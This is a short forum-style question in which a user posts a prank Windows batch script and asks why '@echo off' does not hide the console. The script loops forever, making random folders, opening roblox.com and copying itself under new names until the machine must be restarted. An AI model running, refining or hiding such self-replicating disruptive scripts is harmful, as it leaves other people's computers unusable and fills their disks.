I Have several batch scripts on my computer, many of the harmless and annoying. Unfortunately, @echo off
just isn't working on my computer.
Here is the script:
@echo off
:top
md %random%
start http://roblox.com
set self=%~n0
REM get own filename
TYPE %self%.bat > %self%%random%%random%.bat
goto top
(it's just extremely annoying and pretty much just makes it to where you have to restart)
Normally it wouldn't show the cmd. However, I can see the command prompt clear as day.